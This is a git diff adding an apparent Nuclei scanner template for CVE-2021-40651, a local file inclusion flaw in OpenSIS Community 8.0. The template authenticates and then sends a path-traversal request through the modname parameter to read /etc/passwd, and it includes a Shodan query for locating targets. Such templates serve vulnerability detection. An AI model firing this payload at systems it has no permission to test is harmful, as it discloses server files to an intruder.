diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml new file mode 100644 index 0000000000..efa84bfed4 --- /dev/null +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-40651 + +info: + name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion + author: ctflearner + severity: medium + description: | + OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file. + reference: + - https://www.exploit-db.com/exploits/50259 + - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md + - https://www.youtube.com/watch?v=wFwlbXANRCo + - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-40651 + cwe-id: CWE-22 + cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* + metadata: + max-request: 1 + shodan-query: title:"openSIS" + tags: cve,cve2021,lfi,os4ed,opensis,authenticated + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + + - | + GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - 'contains(body_1, "openSIS")' + - "status_code == 200" + condition: and